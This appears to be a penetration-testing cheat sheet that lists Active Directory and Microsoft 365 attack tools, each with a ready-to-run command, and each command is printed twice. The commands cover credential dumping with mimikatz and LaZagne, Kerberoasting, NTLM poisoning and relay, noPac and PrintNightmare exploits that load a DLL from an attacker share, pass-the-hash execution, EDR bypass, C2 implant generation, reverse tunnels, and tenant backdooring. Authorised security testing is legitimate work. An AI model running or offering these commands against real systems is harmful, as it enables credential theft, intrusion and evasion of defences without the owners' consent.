Internal Pentest Tools Arsenal

Graph-based AD relationship mapper. Identifies attack paths from any user to Domain Admin via ACLs, group memberships, sessions, and delegation.

SharpHound.exe -c All,GPOLocalGroup --zipfilename bh.zip

SharpHound.exe -c All,GPOLocalGroup --zipfilename bh.zip

Swiss army knife for network pentesting. Replaces nxc. SMB/LDAP/MSSQL/WinRM/RDP/SSH enumeration, spraying, command execution.

pipx install netexec

pipx install netexec

PowerShell AD enumeration — users, groups, ACLs, GPOs, trusts, delegation, SPNs. The gold standard for AD recon.

Import-Module .PowerView.ps1; Get-DomainUser

Import-Module .PowerView.ps1; Get-DomainUser

Active Directory information dumper via LDAP. Exports users, groups, computers, policies as HTML and JSON.

ldapdomaindump -u 'DOMAIN\user' -p 'Pass' ldap://DC-IP

ldapdomaindump -u 'DOMAIN\user' -p 'Pass' ldap://DC-IP

Next-gen Windows/SMB enumeration tool. Null sessions, shares, users, groups, password policies via RPC/LDAP/SMB.

enum4linux-ng -A target-ip

enum4linux-ng -A target-ip

Gathers extensive AD data into Excel/CSV — users, computers, GPOs, ACLs, LAPS, trusts. Great for reporting.

.ADRecon.ps1 -OutputType XLSX

.ADRecon.ps1 -OutputType XLSX

LLMNR/NBT-NS/MDNS poisoner. Captures NTLMv1/v2 hashes from multicast name resolution on the local network.

responder -I eth0 -wFb

responder -I eth0 -wFb

The credential extraction tool. LSASS dumping, Kerberos ticket extraction, DPAPI decryption, DCSync, golden/silver tickets.

sekurlsa::logonpasswords

sekurlsa::logonpasswords

C# Kerberos abuse toolkit — AS-REP roasting, Kerberoasting, S4U, delegation abuse, ticket forging, and pass-the-ticket.

Rubeus.exe kerberoast /outfile:hashes.txt

Rubeus.exe kerberoast /outfile:hashes.txt

Python network protocol library. Includes secretsdump (DCSync), ntlmrelayx (relay), psexec/wmiexec/smbexec, GetUserSPNs, and 50+ tools.

pip install impacket

pip install impacket

GPU-accelerated password cracker. Supports 300+ hash types including NTLM, NTLMv2, Kerberoast, AS-REP, and NetNTLM.

hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

Automatically finds and exploits Windows authentication coercion vulnerabilities (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce).

coercer coerce -u user -p pass -t DC-IP -l LISTEN-IP

coercer coerce -u user -p pass -t DC-IP -l LISTEN-IP

NTLM relay attack tool. Relays captured authentication to SMB, LDAP, MSSQL, HTTP, ADCS. Supports RBCD and shadow credentials.

ntlmrelayx.py -t ldap://DC-IP --delegate-access

ntlmrelayx.py -t ldap://DC-IP --delegate-access

C# DPAPI abuse — decrypt browser passwords, credential blobs, and vault entries using user/machine/domain keys.

SharpDPAPI.exe triage

SharpDPAPI.exe triage

AD Certificate Services enumeration and abuse. Finds and exploits ESC1-ESC13 misconfigurations for domain privilege escalation.

certipy find -u user@corp.local -p Pass -dc-ip DC-IP -vulnerable

certipy find -u user@corp.local -p Pass -dc-ip DC-IP -vulnerable

Shadow Credentials attack tool. Adds msDS-KeyCredentialLink to target accounts for certificate-based authentication.

Whisker.exe add /target:victim /domain:corp.local

Whisker.exe add /target:victim /domain:corp.local

One-click local privilege escalation via Kerberos relay. Combines RBCD + S4U for SYSTEM from any domain user.

KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword Pass

KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword Pass

Exploits CVE-2021-42278/42287. Impersonate Domain Controller via SAMAccountName spoofing for instant DA.

noPac.py corp.local/user:Pass -dc-ip DC-IP --impersonate administrator -dump

noPac.py corp.local/user:Pass -dc-ip DC-IP --impersonate administrator -dump

Coerces Windows hosts to authenticate via MS-EFSRPC. Chain with ntlmrelayx to ADCS for domain takeover.

petitpotam.py LISTEN-IP DC-IP

petitpotam.py LISTEN-IP DC-IP

CVE-2021-34527 — Remote code execution via Windows Print Spooler for instant SYSTEM on unpatched hosts.

CVE-2021-1675.py corp.local/user:Pass@TARGET '\\ATTACKER\share\evil.dll'

CVE-2021-1675.py corp.local/user:Pass@TARGET '\\ATTACKER\share\evil.dll'

Feature-rich WinRM shell — file upload/download, PowerShell, DLL loading, log evasion. The go-to for Windows remote access.

evil-winrm -i TARGET -u admin -H NTLM_HASH

evil-winrm -i TARGET -u admin -H NTLM_HASH

Impacket remote execution suite. PsExec (service), SMBExec (no disk write), WMIExec (stealthier). All support pass-the-hash.

wmiexec.py -hashes :NTLM corp.local/admin@TARGET

wmiexec.py -hashes :NTLM corp.local/admin@TARGET

Impacket alternatives for lateral movement via Task Scheduler (atexec) or DCOM (dcomexec). Less commonly monitored.

atexec.py corp.local/admin:Pass@TARGET 'whoami'

atexec.py corp.local/admin:Pass@TARGET 'whoami'

Remote Desktop Protocol command execution. Authenticates via RDP and sends keystrokes for stealthy execution.

SharpRDP.exe computername=TARGET command='cmd /c whoami' username=admin password=Pass

SharpRDP.exe computername=TARGET command='cmd /c whoami' username=admin password=Pass

Windows privilege escalation enumeration — services, registry, credentials, scheduled tasks, DLL hijack opportunities.

winpeas.exe quiet servicesinfo

winpeas.exe quiet servicesinfo

GhostPack C# security audit tool — system info, credentials, browser data, installed software, and security product detection.

Seatbelt.exe -group=all -full

Seatbelt.exe -group=all -full

Retrieves passwords stored on a local computer — browsers, databases, mail, Wi-Fi, sysadmin tools, and more.

lazagne.exe all

lazagne.exe all

C# port of PowerUp. Finds common Windows privilege escalation vectors: misconfigured services, unquoted paths, modifiable binaries.

SharpUp.exe audit

SharpUp.exe audit

Payload creation framework for side-loading. EDR bypass via signed DLLs, process injection, and syscall obfuscation.

ScareCrow -I beacon.bin -Loader dll -domain microsoft.com

ScareCrow -I beacon.bin -Loader dll -domain microsoft.com

Nim-based payload framework. Compiles to native Windows binaries with low AV detection rates.

python3 NimPackt.py -e shinject -i beacon.bin -t csharp

python3 NimPackt.py -e shinject -i beacon.bin -t csharp

Beacon Object Files — in-memory .NET execution and custom BOFs for EDR evasion within C2 frameworks.

# Load via C2 beacon

# Load via C2 beacon

Kernel-level EDR bypass via vulnerable drivers (BYOVD). Removes kernel callbacks, ETW providers, and minifilter altitudes.

EDRSandblast.exe --usermode --kernelmode

EDRSandblast.exe --usermode --kernelmode

Advanced tunneling/pivoting tool using TUN interface. Creates transparent network tunnels without SOCKS proxies.

# Proxy: ligolo-proxy -selfcert
# Agent: ligolo-agent -connect PROXY:11601 -retry

# Proxy: ligolo-proxy -selfcert
# Agent: ligolo-agent -connect PROXY:11601 -retry

Open-source C2 framework. HTTP(S)/mTLS/WireGuard/DNS implants, BOF support, traffic encryption, pivoting.

sliver > generate --mtls LISTEN_IP --os windows --save implant.exe

sliver > generate --mtls LISTEN_IP --os windows --save implant.exe

Modern C2 framework with demon agents. Sleep obfuscation, indirect syscalls, token manipulation, and BOF execution.

# Build and run Havoc teamserver

# Build and run Havoc teamserver

Fast TCP/UDP tunnel over HTTP with SSH. Port forwarding and SOCKS5 proxy through restricted networks.

# Server: chisel server --reverse -p 8080
# Client: chisel client PROXY:8080 R:socks

# Server: chisel server --reverse -p 8080
# Client: chisel client PROXY:8080 R:socks

Azure AD / Entra ID toolkit. Tenant recon, PTA backdoors, Seamless SSO abuse, AAD Connect credential extraction.

Import-Module AADInternals; Invoke-AADIntReconAsOutsider -DomainName corp.com

Import-Module AADInternals; Invoke-AADIntReconAsOutsider -DomainName corp.com

Azure AD enumeration framework. Dumps users, groups, service principals, apps, conditional access, and device registrations.

roadrecon auth -u user@corp.com -p Pass; roadrecon gather; roadrecon gui

roadrecon auth -u user@corp.com -p Pass; roadrecon gather; roadrecon gui

Post-exploitation framework for Microsoft Graph API. Token manipulation, email access, Teams messages, and SharePoint enumeration.

Import-Module .GraphRunner.ps1; Get-GraphTokens

Import-Module .GraphRunner.ps1; Get-GraphTokens

Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring Microsoft 365 / Teams accounts.

TeamFiltration.exe --outpath results --enum --domain corp.com

TeamFiltration.exe --outpath results --enum --domain corp.com